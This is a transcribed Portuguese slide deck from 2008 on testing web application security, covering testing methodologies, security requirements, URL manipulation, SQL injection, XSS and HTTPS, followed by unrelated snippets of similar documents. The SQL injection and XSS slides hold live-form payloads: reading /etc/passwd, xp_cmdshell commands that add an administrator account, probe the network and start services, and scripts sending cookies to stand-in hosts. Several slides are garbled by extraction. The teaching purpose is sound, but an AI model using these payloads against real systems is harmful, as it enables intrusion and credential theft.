Como testar segurança em aplicações WEB. Rodrigo Assad / Tarciana Katter outubro/2008

Tamanho: px
Começar a partir da página:

Download "Como testar segurança em aplicações WEB. Rodrigo Assad / Tarciana Katter outubro/2008"

Transcrição

1 Como testar segurança em aplicações WEB Rodrigo Assad / Tarciana Katter outubro/2008

2 Agenda Introdução Explicando cada ataque através de exemplos URL Manipulation SQL Injection XSS Cross Site Scripting Como resolve-los O que HTTPS nos oferece Porque HTTPS não resolve nossos problemas? Próximos passos do projeto.

3 Introdução Os ataques a serviços de rede estão se tornando muito sofisticados A criatividade humana não para Mas o que falta? APLICAÇÕES!!! Mas será que é possível? Atualmente a maioria dos BUG s reportados estão em aplicações Application Security!= Network Security Não se esqueçam: Quem provê acesso aos dados? As aplicações!!!

4 Lendas Urbanas Não há problemas Até que a aplicação seja comprometida Erros de runtime não são problemas (tratamento de erros) Exponham informações relevantes Consumam todo recurso do servidor Web Services não são vulneráveis Quase nunca testados e raramente a segurança é considerada Solução Testes de penetração. São caros!!!

5 Pesquisas Gartner 75% dos ataques acontecem nas aplicações Em caso de falha no sistema provavelmente os desenvolvedores são três vezes mais culpados do que os administradores de sistemas NIST 92% das vulnerabilidades estão no nível de aplicações

6 Objetivo Nosso foco será demonstrar estes BUG s de forma prática Para nos proteger temos que entender das táticas e armas no nosso inimigo Temos que ter nossas armas para nos defender!!!

7

8 Testes e segurança por onde vai.

9 Contexto Não há segurança de sistemas sem a conjunção de três fatores Boas praticas de codificação Metodologia adequada (arquitetura e etc.) Testes... E aí vem...

10 O que é segurança Segurança em um end line Mas o que é isso? Não se discute segurança sem entender de Arquitetura de Computadores, Sistemas Operacionais, Redes de computadores (protocolos de comunicação, Linguagem de programação, engenharia de software e Lógica.)

11 O que é segurança Então o que eu preciso saber para se poder testar... Opção 1: seguir os procedimentos definidos por alguém que sabe disso tudo Opção 2: Saber disso tudo

12 Então para o que querem...

13 Então para o que querem...

14 Então para o que querem...

15 Então para o que querem...

16 Então para o que querem...

17 Então para o que querem...

18 Então para o que querem...

19 Segurança de Redes Recursos Sites

20 Segurança de Redes Periódicos Linux Journal Sys Admin Magazine Information Security SC Info Security Magazine Security Magazine (Nacional)

21 Testes

22 Metodologias Atualmente existem algumas metodologias de testes de segurança como: OWASP Testing Guide OSSTMM ISSAF NIST

23 OWASP OWASP Testing Guide é baseado na SDLC, e tem por objetivo prover um framework para adoção de testes de segurança nas empresas. Divide-se em cinco fases: Antes do Desenvolvimento começar Durante a Definição e Desing Durante o Desenvolvimento Durante a Implantação Manutenção

24 OSSTMM

25

26 OSSTMM OSSTMM do inglês Open-Source Security Testing Methodology Manual, oferece uma metodologia formal para uma auditória operacional de segurança, métricas, regras para uma análise lógica e imparcial e um padrão de relatório de certificação para segurança.

27 ISSAF ISSAF do inglês Information System Security Assessemt Framework, que tem como objetivo prover um único ponto de referencia para avaliação da segurança.

28 NIST

29 Preparando para Testar Agora faça seu checklist O que fazer? O que testar? Como fazer? São as resposta que queremos. Vamos começar por... AQUI

30 Primeiros Passos Elicitar e documentar os requisitos de segurança Mapear e entender as vulnerabilidades associadas a cada requisito de segurança Utilizar Checklist para verificar possíveis falhas de código Testes funcionais Testes Automáticos

31 Em Aplicações WEB

32 Elicitando Requisitos Esta sendo elaborado um guia que lista os requisitos de segurança web; Cada requisito é composto por uma breve explicação, técnicas utilizadas para implementação, e as vulnerabilidades associadas.

33 Guia O Guia vem responder as seguintes perguntas: Qual o meio que será utilizada para o sistema? Qual a solução utilizada? Quais vulnerabilidades precisam ser mitigas? Qual a ação para mitigar? Qual a linguagem a ser utilizada? Impactos da escolha arquitetural, frameworks e componentes?

34 Template Primeiro passo é identificar o objetivo do grupo de requisitos: Controle de Acesso: O subsistema de segurança agrupará as funcionalidades relativas à acessibilidade dos usuários às funções do sistema, é formado pelos módulos abaixo descritos.

35 Template Segundo passo é identificar o requisito: [RNF001] Identificação e autenticação Externo: Tem por objetivo solicitar ao usuário a digitação de um login alfa e uma senha encriptografada pelo algoritmo<<verificar o algoritmo utilizado>> após ser digitada, previamente cadastrada, efetuando, desta forma, a autenticação do mesmo. Nesta funcionalidade, o sistema determinará a permissão ou a negação de acesso ao Sistema

36 Template Terceiro passo é identificar prioridades, dependências e impacto: Prioridade: Alto Requisitos dependentes: RF003 Desenvolver a interface de login do sistema Impacto: Baixo, pois os requisitos de performance não são requeridos

37 Template Quarto passo é identificar as vulnerabilidades associadas: Vulnerabilidade Mitigação Impacto Adivinhar senhas Política de senha Usabilidade Repasse de senhas Criar uma cultura de segurança na empresa N/A Ataque de força bruta Bloqueio de acesso, Disponibilidade (pode derrubar o servidor) Ignorando o esquema de autenticação [33A] Autenticação de sessões, seguir normas e padrões de segurança no código Performance Diretório de transferência / Inclusão de arquivos [33A] Validar os arquivos incluídos, verificar permissão de acesso aos arquivos Performance

38 CheckList Faça um checklist com todos os pontos que precisam ser checados na sua aplicação web. Existe arquivos com checklist completos disponibilizados na internet um deles é: uk/msdn/security/the%20developer%20h ighway%20code.pdf

39 Vulnerabilidades Vamos apresentar alguma vulnerabilidades mais comuns e como testá-las: URL Manipulation SQL Injection XSS Cross Site Scripting

40 URL Manipulation O comando GET requisita informações importantes na URL Os parâmetros podem ser manipulados para se obter resultados satisfatórios O impacto é ALTO Variações podem ser feitas para se tentar obter resultados interessantes ebitamount=1

41 URL Manipulation

42 URL Manipulation

43 URL Manipulation Testes: Verificar se algum parâmetro é passado via http header. Verificar se os dados sensíveis armazenados no cookie estão encriptados Verificar que dados sensíveis não são armazenados no Cache Verificar se os dados encriptados estão voltando corretamente (Hash) Verificar que além dos parâmetros os campos também estão sendo encriptados

44 URL Manipulation Ferramentas:

45 SQL Injection

46 SQL Injection A idéia é injetar um comando SQL (Structured Query Language) ou comando como input dos dados em um formulário WEB Todos os parâmetros passados são direcionados para o banco de dados O atacante pode manipular com as tabelas e dados diretamente

47 Causas - SQL Injection! "#$%!!!! 3 #&' " ()*(+',-)./,0 "1231*$ )&(556 &(5! "" " "" #! &! $, "&5,! # 7 &/, 89 (:! (#! 3 7 # & 3

48 SQL Injection Problemas Esperado: "; ;4<= > " #? " " ; +7 "9 "1 1 14<= 4<=1 Não esperado: "; ; #?; +7 "9 "1 11

49 SQL Injection Problemas Esperado: ) "; 6 ;BCC2 ()*(+ ',-)./, "1 1 1BCC2 1BCC21 Não esperado: ) ";1,44 6 ; ()*(+ ',-)./, "11,44 11

50 SQL Injection Login com Sucesso Esperado Não esperado

51 SQL Injection Mais exemplos 87 " " (7 ',-./, 7 151*$" D7 5 (" E7E " ',-./," 151*$4()*(+',- 51*$4()*(+',-

52 SQL Injection Mais exemplos 6? (" E7E " ',-""./," 151,7E "8F1G- G1! 7 H (" E7E " ',-""./," I B & "1*$ I9 9 4<=1!

53 SQL Injection Mais exemplos D7 "J $ (" E7E " ',-""./," 151!$,6(%""! "? (" E7E " ',-""./," 151! 8*,(8*(""1" E1 17E "1 D)I B & "1I9 1 I1 1I)

54 SQL Injection Mais exemplos " " HK (" E7E " ',-""./," 151! )6$("" (" I B & "1./," I B9 : & "1!

55 Caracteres utilizados 'ou " Utilizado para indicar tipo char -- ou # Comentário /* */ Comentário de várias linhas + Adição, concatenação Concatenação % Wildcard?Param1=foo&Param2=bar Parâmetros da URL PRINT Muito utilizado quando não temos Variável Local Variável Global waitfor delay '0:0:10' Delay

56 SQL Injection here=all&sort_mode=delete%20*%20from %20users_uses

57 Determinando a versão do SGBD Na maioria do tempo as mensagens de erro nos ajudam a identificar qual o SGBD utilizado As mensagens de erro ODBC mostram SGBD utilizado Se não tivermos as mensagens ODBC Tentamos analisar qual a tecnologia utilizada na aplicação e no servidor WEB Tentamos utilizar caracteres, comandos ou stored procedures que geram erros específicos

58 Determinando a versão do SGBD MS SQL T-SQL MySQL Access Oracle PL/SQL DB2 Postgres PL/pgSQL Concatenate Strings ''+'' concat (" ", " ") " "&" " '' '' " "+" " '' '' Null replace Isnull() Ifnull() Iff(Isnull()) Ifnull() Ifnull() COALESCE () Position CHARINDE X LOCATE() InStr() InStr() InStr() TEXTPOS() Op Sys interaction xp_cmdshe ll select into outfile / dumpfile #date# utf_file import from export to Call Cast Yes No No No Yes Yes

59 Interagindo com o sistema Operacional Existem duas maneiras de se interagir com o sistema operacional Lendo arquivos Obtendo arquivos de senhas Trocando senhas dos usuários Executando comandos que troquem parâmetros do sistema Execução direta de comandos Não ha limites!!! Qualquer ação depende do privilégio que o usuários utilizado pelo SGBD possui

60 MySQL e a interação O.S. MySQL LOAD_FILE 'union select 1,load_file('/etc/passwd'),1,1,1; LOAD DATA INFILE create table temp( line blob ); load data infile '/etc/passwd'into table temp; select * from temp; SELECT INTO OUTFILE

61 MS SQL e a interação O.S. MS SQL Server '; exec master..xp_cmdshell 'ipconfig > test.txt'-- '; CREATE TABLE tmp (txt varchar(8000)); BULK INSERT tmp FROM 'test.txt'-- '; begin varchar(8000) ; '; select 'from tmp where ; as x into temp end -- 'and 1 in (select substring(x,1,256) from temp) -- '; sysname; = 'del test.txt'; EXEC drop table temp; drop table tmp --

62 Arquitetura mais comum Sempre tenha em mente O SQL normalmente é executado em um outro servidor O servidor de BD normalmente não tem acesso a Internet e é protegido

63 Comando de rede relevantes Usando a SP xp_cmdshell podemos executar: Ipconfig /all Tracert myip arp -a nbtstat -c netstat -ano route print

64 Manipulando com as Informações da rede '; varchar(256); = 'del test.txt && arp -a >> test.txt && ipconfig /all >> test.txt && nbtstat -c >> test.txt && netstat -ano >> test.txt && route print >> test.txt && tracert -w 10 -h 10 google.com >> test.txt'; EXEC -- '; CREATE TABLE tmp (txt varchar(8000)); BULK INSERT tmp FROM 'test.txt'-- '; begin varchar(8000) ; '; select 'from tmp where ; as x into temp end -- 'and 1 in (select substring(x,1,255) from temp) -- '; sysname; = 'del test.txt'; EXEC drop table temp; drop table tmp --

65 Manipulando com o S.O. Linux MySQL 'union select 1, (load_file('/etc/passwd')),1,1,1; MS SQL Criando usuários '; exec xp_cmdshell 'net user /add victor Pass123'-- '; exec xp_cmdshell 'net localgroup /add administrators victor'-- Iniciando serviços '; exec master..xp_servicecontrol 'start','ftp Publishing'--

66 Obtendo a senha do VNC '; binary(8) output select as bigint) as x into TEMP-- 'and 1 in (select cast(x as varchar) from temp) --

67 SQL Injection Testes: Identifique os parâmetros, html e xml tags utilizados na aplicação web Substitua o conteúdo dos parâmetros por todos caracteres utilizados, (como demonstrados anteriormente) Verifique que as queries foram substituídas por stored procedures; Verificar se as mensagens de erro fornecem alguma informação; Verifique que os usuários da aplicação web tem o menor nível de acessibilidade possível no banco de dados; Verificar que todos os Inputs estão sendo validados Verificar se existe limite para os uploads; Verificar que a aplicação não aceita: dado binário, caracteres de comentário...

68 SQL Injection Ferramentas

69 XSS Cross Site Scripting

70 WEB Session Hijaking Não a ligação entre o ID do login e o ID da sessão A sessão do usuário pode ser roubada Impacto é ALTO A idéia e obter de alguma forma o HASH da sessão

71 Cross Site Scripting Webpage + Cookies Link malicioso em uma pagina web ou malicioso <SCRIPT>Envia o Cookie para attacker.com</script> Executed <SCRIPT>Envia cookie para sitehaker.com / Cookie

72 Cross Site Scripting (XSS) Esta vulnerabilidade tira vantagens de sites que não fazem o tratamento dos dados de entrada. O POST contém um script que pode ser executado via browser <script>window.navigate("http:// somesite.net/steal.asp?cookie=" +document.cookie)</script>

73 XSS Como o atacante depura Pode colocar uma mensagem no post <script>alert( this is vulnerable )</script> A aplicação retorna a sua submissão

74 XSS Exemplos Pode se receber um com o um link O resultado é enviado para um site <scrip t>window. navigate("http://badsite.net/steal.a sp?cookie="+document.cookie)</script > ple.html

75 XSS Exemplos do passado ert(%22rfdslabs%22)%3c/script%3e ><script>alert(document.cookie)</script> ge2.html?tw=<script>alert( Test );</script> cument.cookie)</script>&frompage=4&page=1&ct=vvt V&mh=0&sh=0&RN=1 arch_exe?search_text=%22%3e%3cscript%3ealert%28 document.cookie%29%3c%2fscript%3e

76 !! "!#

77 Testes Verificar os posts disponíveis na aplicação Verificar que as sessões são sempre checadas Verificar os cookies não provêem dados sensíveis Verificar que não é possível executar outro script dentro da aplicação

78 SQL Injection Ferramentas

79 Sistemas distribuídos Sistemas distribuídos podem ser vistos de maneira geral como diferentes elementos de software (aplicações) executando remotamente (ou em locais remotos) e se comunicando para fornecer/consumir serviços. Conjunto de máquinas autônomas Interconectadas por canais de comunicação Comunicando-se por troca de mensagens Independência de falhas (falhas parciais) Ausência de relógio global Ausência de estado global Estado compartilhado da aplicação (através de comunicação)

80 Sistemas distribuídos Além de considerar todos os problemas anteriores Eles se potencializam num cenário distribuído Precisamos usar Comunicação Segura Autenticação Integridade dos dados trafegados Serviços de rede passam a ser problemas : DNS Principalmente.

81 Comunicação segura O que podemos usar VPN: IPSec, PPTP,... Custoso Por ser necessário uma configuração especial, a aplicação depende não somente dela mas da rede prover Mas lembre-se

82 E a aplicação? Autenticação Integridade dos dados trafegados Que tal uma PKI? Temos Autenticação Temos Integridade e confidencialidade se encriptarmos os dados

83 O que HTTPS nos oferece HTTPS resolve os problemas de segurança apontados anteriormente? Mas então para que usar HTTPS? Muitas vezes dizemos que o uso de HTTPS nos temos o servidor seguro

84 O que HTTPS nos oferece HTTPS é a versão segura do protocolo HTTP que implementa a autenticação e encriptação da comunicação. Previne os ataques do tipo men-in-the-middle e que dados interceptados sejam lidos A autenticação é uma característica muito explorada atualmente ICP-BR

85 O que HTTPS nos oferece? 1. Negocia qual sistema de codificação será usado durante a transferência 2. Estabelece e troca as chaves de sessão entre o cliente e o servidor 3. Opcionalmente autentica o servidor para o cliente 4. Opcionalmente autentica o cliente para o servidor

86 Autenticação usando certificados e chaves públicas/privadas Fase do desafio (Mensagem Randômica) Identificação da Conexão Randômica (server) Protocolos de encriptação Fase do desafio (Mensagem Identificação Randômica) da Conexão Randômica (server) Protocolos de Encriptação OK Web server End user OK! CA chave pública Chave e certificado público do servidor Se o cliente não tiver a chave pública da CA (recebemos uma mensagem informando O certificado não é valido) Cancel Always Trust Trust this time

87 Autenticação usando certificados e chaves públicas/privadas Fase do desafio (Mensagem Randômica Web server Identificação da Conexão Randômica (server) Sessão master Par de chaves simétricas (Encriptado) End user CA chave pública Chave e certificado público do servidor

88 Autenticação usando certificados e chaves públicas/privadas Fase do desafio (Mensagem Randômica Identificação da da Conexão Randômica (server) A autenticação do cliente pode começar agora Identificação da Conexão Randômica Fase do (server) desafio (Mensagem Randômica Sessão master Leitura Par de chaves simétricas Web server Escrita End user Escrita CA chave pública Chave e certificado Par de chaves público do servidor simétricas Leitura

89 Porque HTTPS não resolve nossos problemas? Porque nossos problemas não estão apenas nos protocolos ou na comunicação. Temos problemas nas aplicações e estas hierarquicamente estão acima dos protocolos de comunicação.

90 Autorização Associar direitos, capacidade e habilidades associadas a um assunto A autorização geralmente vem após uma autenticação Ex.: Uma vez que se sabe quem é o usuário foi autenticado o serviço decidirá o que o usuário pode fazer no contexto que ele esta autorizado

91 Autorização RBAC Autorização baseada em perfil Autorização baseada em contexto

92 Auditoria Login analises Data warehouse Mineração de dados Correlação de eventos

93 Próximos passos Componente focado em resolver os problemas apresentados Não intrusivo Flexível Performance Fácil de usar Autenticação Componente para autenticar Login/Senha Certificado Digital Biometria

94 Referências Open-Source Security Testing Methodology Manual Web Application Disassembly with ODBC Error Messages JavaOne 2005 Strategies for Securing Java Technology Code Web Services Security Attacks in Action 9 Ways to Hack a Web App Advanced SQL Injection In SQL Server applications Advanced Cross Site Scripting CROSS-SITE TRACING (XST) SQL Injection Signatures Evasion

95 F I M

Instituto de Inovação com TIC. [Junho/ 2009]

Instituto de Inovação com TIC. [Junho/ 2009] Instituto de Inovação com TIC [Junho/ 2009] Segurança em aplicações WEB: A nova fronteira rodrigo.assad@cesar.org.br Redes de Computadores (Histórico) Segurança de Redes (Histórico) Robert Tappan

Leia mais

Falhas mais comuns em aplicações web

Falhas mais comuns em aplicações web Falhas mais comuns em aplicações web Rodrigo Assad, out/2007 1 Agenda Introdução Explicando cada ataque através de exemplos URL Manipulation SQL Injection XSS Cross Site Scripting Como resolve-los O que

Leia mais

Segurança da Internet. Ricardo Terra (rterrabh [at] gmail.com) Segurança da Internet Outubro, 2013 2012 1

Segurança da Internet. Ricardo Terra (rterrabh [at] gmail.com) Segurança da Internet Outubro, 2013 2012 1 Segurança da Internet Ricardo Terra rterrabh [at] gmail.com Outubro, 2013 2012 1 CV Nome: Ricardo Terra Email: rterrabh [at] gmail.com www: ricardoterra.com.br Twitter: rterrabh Lattes: lattes.cnpq.br/

Leia mais

Boas Práticas de Desenvolvimento Seguro

Boas Práticas de Desenvolvimento Seguro Boas Práticas de Desenvolvimento Seguro Julho / 2.012 Histórico de Revisões Data Versão Descrição Autor 29/07/2012 1.0 Versão inicial Ricardo Kiyoshi Página 2 de 11 Conteúdo 1. SEGURANÇA DA INFORMAÇÃO

Leia mais

Top Ten OWASP. Fausto Levandoski 1. Curso Tecnólogo em Segurança da Informação Av. Unisinos, 950 93.022-000 São Leopoldo RS Brasil. farole@gmail.

Top Ten OWASP. Fausto Levandoski 1. Curso Tecnólogo em Segurança da Informação Av. Unisinos, 950 93.022-000 São Leopoldo RS Brasil. farole@gmail. Top Ten OWASP Fausto Levandoski 1 1 Universidade do Vale do Rios dos Sinos (UNISINOS) Curso Tecnólogo em Segurança da Informação Av. Unisinos, 950 93.022-000 São Leopoldo RS Brasil farole@gmail.com Abstract.

Leia mais

(In)Segurança em Aplicações Web. Marcelo Mendes Marinho mmarinho@br.ibm.com Thiago Canozzo Lahr tclahr@br.ibm.com

(In)Segurança em Aplicações Web. Marcelo Mendes Marinho mmarinho@br.ibm.com Thiago Canozzo Lahr tclahr@br.ibm.com (In)Segurança em Aplicações Web Marcelo Mendes Marinho mmarinho@br.ibm.com Thiago Canozzo Lahr tclahr@br.ibm.com Agenda Introdução Porque segurança em aplicações é prioridade? Principais causas de vulnerabilidades

Leia mais

Recomendações de Segurança para Desenvolvimento de Aplicações Web

Recomendações de Segurança para Desenvolvimento de Aplicações Web Recomendações de Segurança para Desenvolvimento de Aplicações Web Índice 1. INTRODUÇÃO...3 1.1 CONTROLE DE VERSÃO...3 1.2 OBJETIVO...3 1.3 PÚBLICO - ALVO...4 2 VULNERABILIDADES COMUNS...4 2.1 INJEÇÃO DE

Leia mais

XSS - CROSS-SITE SCRIPTING

XSS - CROSS-SITE SCRIPTING Segurança XSS - CROSS-SITE SCRIPTING XSS - CROSS-SITE SCRIPTING Vamos supor a seguinte situação: O site ingenuo.com tem um fórum As pessoas escrevem comentários nesse fórum e eles são salvos diretamente

Leia mais

O atacante pode roubar a sessão de um usuário legítimo do sistema, que esteja previamente autenticado e realizar operações que o mesmo poderia.

O atacante pode roubar a sessão de um usuário legítimo do sistema, que esteja previamente autenticado e realizar operações que o mesmo poderia. Explorando e tratando a falha de Cross-site-scripting (XSS) 1 D E D E Z E M B R O D E 2 0 1 5 Muito pouco falada e com alto nível crítico dentro das vulnerabilidades relatadas, o Cross-site-scripting (XSS)

Leia mais

Fonte: http://www.online-security-solution.com/ - Illustration by Gaich Muramatsu

Fonte: http://www.online-security-solution.com/ - Illustration by Gaich Muramatsu Fonte: http://www.online-security-solution.com/ - Illustration by Gaich Muramatsu Prof. Hederson Velasco Ramos Uma boa maneira de analisar ameaças no nível dos aplicativo é organiza las por categoria de

Leia mais

Prof. Roberto Franciscatto 4º Semestre - TSI - CAFW. Free Powerpoint Templates Page 1

Prof. Roberto Franciscatto 4º Semestre - TSI - CAFW. Free Powerpoint Templates Page 1 Segurança na Web Capítulo 9: Segurança em Aplicações Web Prof. Roberto Franciscatto 4º Semestre - TSI - CAFW Page 1 Introdução Quando se fala em segurança na WEB é preciso pensar inicialmente em duas frentes:

Leia mais

Segurança na WEB Ambiente WEB estático

Segurança na WEB Ambiente WEB estático Segurança de Redes Segurança na WEB Prof. Rodrigo Rocha prof.rodrigorocha@yahoo.com Servidor IIS Apache Cliente Browser IE FireFox Ambiente WEB estático 1 Ambiente Web Dinâmico Servidor Web Cliente Navegadores

Leia mais

Segurança em Web Aula 2

Segurança em Web Aula 2 Open Web Application Security Project Segurança em Web Aula 2 Maycon Maia Vitali ( 0ut0fBound ) maycon@hacknroll.com Hack n Roll Centro Universitário Vila Velha Agenda Revisão da Última Aula SQL Injection

Leia mais

OWASP. The OWASP Foundation http://www.owasp.org. As 10 mais críticas vulnerabilidades de segurança em Aplicações Web

OWASP. The OWASP Foundation http://www.owasp.org. As 10 mais críticas vulnerabilidades de segurança em Aplicações Web As 10 mais críticas vulnerabilidades de segurança em Aplicações Web Carlos Serrão Portugal ISCTE/DCTI/Adetti/NetMuST Abril, 2009 carlos.serrao@iscte.pt carlos.j.serrao@gmail.com Copyright 2004 - The Foundation

Leia mais

Segurança em Sistemas Web. Addson A. Costa

Segurança em Sistemas Web. Addson A. Costa Segurança em Sistemas Web Addson A. Costa Spoofing de formulários Spoofing consiste em falsificação, por exemplo, na área de redes um computador pode roubar o IP de outro e assim fazer-se passar por ele.

Leia mais

PROCEDIMENTOS ARMAZENADOS (Stored Procedures)

PROCEDIMENTOS ARMAZENADOS (Stored Procedures) PROCEDIMENTOS ARMAZENADOS (Stored Procedures) 1. Introdução Stored Procedure é um conjunto de comandos, ao qual é atribuído um nome. Este conjunto fica armazenado no Banco de Dados e pode ser chamado a

Leia mais

1 SQL Injection A consulta normal SQL seria:

1 SQL Injection A consulta normal SQL seria: HTTP Testando aplicação Web. Pegaremos dois tipos de ataques dentre os top 10 do OWASP 1 SQL Injection A consulta normal SQL seria: SELECT * FROM Users WHERE Username='$username' AND Password='$password'

Leia mais

Segurança Web com PHP 5 Douglas V. Pasqua Zend Certified Enginner

Segurança Web com PHP 5 Douglas V. Pasqua Zend Certified Enginner Segurança Web com PHP 5 Douglas V. Pasqua Zend Certified Enginner Objetivo Disseminar boas práticas para o desenvolvimento de código seguro em php. Exemplificar como são feitos os ataques e suas respectivas

Leia mais

Segurança em Aplicações Web Metodologia OWASP

Segurança em Aplicações Web Metodologia OWASP Segurança em Aplicações Web Metodologia OWASP Weekly Seminar Lucas Vinícius da Rosa Laboratório de Segurança em Computação () Universidade Federal de Santa Catarina (UFSC) lvrosa@inf.ufsc.br 2012 Sumário

Leia mais

Proposta de pentest. O pentest realizado vai desde ataques aos servidores até testes na programação das aplicações com tentativas reais de invasão;

Proposta de pentest. O pentest realizado vai desde ataques aos servidores até testes na programação das aplicações com tentativas reais de invasão; initsec Proposta de pentest 1. O que é? Pentest (Penetration Test) é uma avaliação de maneira realista da segurança empregada em aplicações web e infraestruturas de TI no geral. O Pentest constitui da

Leia mais

Nomes: Questão 1 Vulnerabilidade: SQL Injection (Injeção de SQL):

Nomes: Questão 1 Vulnerabilidade: SQL Injection (Injeção de SQL): Nomes: Questão 1 Vulnerabilidade: SQL Injection (Injeção de SQL): Nos últimos anos uma das vulnerabilidades mais exploradas por usuários mal-intencionados é a injeção de SQL, onde o atacante realiza uma

Leia mais

Aplicação web protegida

Aplicação web protegida Sua aplicação web é segura? SEGURANÇA Aplicação web protegida Aplicações web oferecem grandes riscos à segurança. Aprenda a proteger todos os elementos dessa complexa equação. por Celio de Jesus Santos

Leia mais

Transações Seguras em Bancos de Dados (MySQL)

Transações Seguras em Bancos de Dados (MySQL) Transações Seguras em Bancos de Dados (MySQL) Índice Entendendo os storage engines do MySQL 5 1 As ferramentas 1 Mais algumas coisas que você deve saber 1 Com a mão na massa 2 Mais ferramentas Usando o

Leia mais

AULA APLICAÇÕES PARA WEB SESSÕES E LOGIN E SENHA

AULA APLICAÇÕES PARA WEB SESSÕES E LOGIN E SENHA Sumário Construção de sistema Administrativo... 1 Sistema de Login... 2 SQL INJECTION... 2 Técnicas para Evitar Ataques... 2 Formulário de Login e Senha fará parte do DEFAULT... 5 LOGAR... 5 boas... 6

Leia mais

Sumário Agradecimentos... 19 Sobre.o.autor... 20 Prefácio... 21 Capítulo.1..Bem-vindo.ao.MySQL... 22

Sumário Agradecimentos... 19 Sobre.o.autor... 20 Prefácio... 21 Capítulo.1..Bem-vindo.ao.MySQL... 22 Sumário Agradecimentos... 19 Sobre o autor... 20 Prefácio... 21 Capítulo 1 Bem-vindo ao MySQL... 22 1.1 O que é o MySQL?...22 1.1.1 História do MySQL...23 1.1.2 Licença de uso...23 1.2 Utilizações recomendadas...24

Leia mais

Desenvolvimento e disponibilização de Conteúdos para a Internet

Desenvolvimento e disponibilização de Conteúdos para a Internet Desenvolvimento e disponibilização de Conteúdos para a Internet Por Matheus Orion Principais tecnologias front-end HTML CSS JAVASCRIPT AJAX JQUERY FLASH JAVA APPLET Linguagens que executam no cliente HTML

Leia mais

FAPLAN - Faculdade Anhanguera Passo Fundo Gestão da Tecnologia da Informação Banco de Dados II Prof. Eder Pazinatto Stored Procedures Procedimento armazenados dentro do banco de dados Um Stored Procedure

Leia mais

Campus Party 2016 São Paulo, SP 27 de janeiro de 2016

Campus Party 2016 São Paulo, SP 27 de janeiro de 2016 Campus Party 2016 São Paulo, SP 27 de janeiro de 2016 WORKSHOP: Programação segura para WEB Dionathan Nakamura nakamura@cert.br Agenda 14:15 16:00 10-20 min: configuração inicial 30-45 min: parte teórica

Leia mais

Arquitetura de BDs Distribuídos. Victor Amorim - vhca Pedro Melo pam2

Arquitetura de BDs Distribuídos. Victor Amorim - vhca Pedro Melo pam2 Victor Amorim - vhca Pedro Melo pam2 Arquitetura de BDs Distribuídos Sistemas de bds distribuídos permitem que aplicações acessem dados de bds locais ou remotos. Podem ser Homogêneos ou Heterogêneos: Homogêneos

Leia mais

Construindo uma aplicação PHP à Prova de Balas

Construindo uma aplicação PHP à Prova de Balas Construindo uma aplicação PHP à Prova de Balas Rafael Jaques FISL 11 - Porto Alegre - 24/07/10 Buscai primeiro o reino do Senhor e a sua justiça, e todas as demais coisas vos serão acrescentadas (Mateus

Leia mais

Segurança no Desenvolvimento, Implantação e Operação de Sistemas de Informação Baseado na ISO 15408

Segurança no Desenvolvimento, Implantação e Operação de Sistemas de Informação Baseado na ISO 15408 Segurança no Desenvolvimento, Implantação e Operação de Sistemas de Informação Baseado na ISO 15408 Palestrante: Alexandre Sieira, CISSP Autores: Alexandre Correia Pinto, CISSP Alexandre Sieira, CISSP

Leia mais

Segurança do Wireless Aplication Protocol (WAP)

Segurança do Wireless Aplication Protocol (WAP) Universidade de Brasília UnB Escola de Extensão Curso Criptografia e Segurança na Informática Segurança do Wireless Aplication Protocol (WAP) Aluno: Orlando Batista da Silva Neto Prof: Pedro Antônio Dourado

Leia mais

PROGRAMAÇÃO EM BANCO DADOS Stored Procedure e Trigger

PROGRAMAÇÃO EM BANCO DADOS Stored Procedure e Trigger PROGRAMAÇÃO EM BANCO DADOS Stored Procedure e Trigger A tecnologia de banco de dados permite persistir dados de forma a compartilha-los com varias aplicações. Aplicação 1 aplicação 2 aplicação 3 SGDB Banco

Leia mais

Construindo uma aplicação PHP à Prova de Balas

Construindo uma aplicação PHP à Prova de Balas Construindo uma aplicação PHP à Prova de Balas Rafael Jaques TcheLinux - Porto Alegre - 14/11/09 Buscai primeiro o reino do Senhor e a sua justiça, e todas as demais coisas vos serão acrescentadas (Mateus

Leia mais

Segurança com o MySQL

Segurança com o MySQL 1. Introdução Segurança com o MySQL Anderson Pereira Ataides O MySQL sem dúvida nenhuma, é o banco de dados open source mais conhecido do mercado e provavelmente o mais utilizado. Ele é rápido, simples,

Leia mais

Bool setcookie (string nome [, string valor [, int validade [, string caminho [, string dominio [, int seguro]]]]] )

Bool setcookie (string nome [, string valor [, int validade [, string caminho [, string dominio [, int seguro]]]]] ) Disciplina: Tópicos Especiais em TI PHP Este material foi produzido com base nos livros e documentos citados abaixo, que possuem direitos autorais sobre o conteúdo. Favor adquiri-los para dar continuidade

Leia mais

Desenvolvimento e disponibilização de Conteúdos para a Internet

Desenvolvimento e disponibilização de Conteúdos para a Internet Desenvolvimento e disponibilização de Conteúdos para a Internet Por Matheus Orion OWASP A Open Web Application Security Project (OWASP) é uma entidade sem fins lucrativos e de reconhecimento internacional,

Leia mais

GR1NCH/Rêner (gr1nch@dclabs.com)

GR1NCH/Rêner (gr1nch@dclabs.com) GR1NCH/Rêner (gr1nch@dclabs.com) Agenda O que seria um ataque de SQL Injection. As falhas de um administrador. O código ASP vulnerável. O ponto de vista do invasor e as etapas de um ataque: Levantamento

Leia mais

SQL Procedural. Josino Rodrigues Neto josinon@gmail.com

SQL Procedural. Josino Rodrigues Neto josinon@gmail.com SQL Procedural Josino Rodrigues Neto josinon@gmail.com SQL Procedural Agregada em SQL-92 As ferramentas têm nomes para suas linguagens SQL procedurais/embutidas Oracle : PL/SQL Postgres PL/Pgsql SQL Server

Leia mais

Gerência de Banco de Dados

Gerência de Banco de Dados exatasfepi.com.br Gerência de Banco de Dados Prof. Msc. André Luís Duarte Banco de Dados Os bancos de dados são coleções de informações que se relacionam para criar um significado dentro de um contexto

Leia mais

BANCO DE DADOS II Prof. Ricardo Rodrigues Barcelar http://www.ricardobarcelar.com

BANCO DE DADOS II Prof. Ricardo Rodrigues Barcelar http://www.ricardobarcelar.com - Aula 10 - PROCEDIMENTOS ARMAZENADOS - STORED PROCEDURES 1. INTRODUÇÃO Em muitas situações será necessário armazenar procedimentos escritos com a finalidade de se utilizar recursos como loop, estruturas

Leia mais

Prova de pré-requisito

Prova de pré-requisito Prova de pré-requisito Curso Python e Django 1. Ao se acessar o site www.google.com qual comando e parâmetros são enviados para o servidor pelo navegador? a. GET / b. GET www.google.com c. PAGE index.html

Leia mais

SGBDs Móveis. Sumário 12/06/11. Emmanuel Férrer & Gabriela Fernanda. Introdução. Desafios do armazenamento. SQL Anywhere Studio.

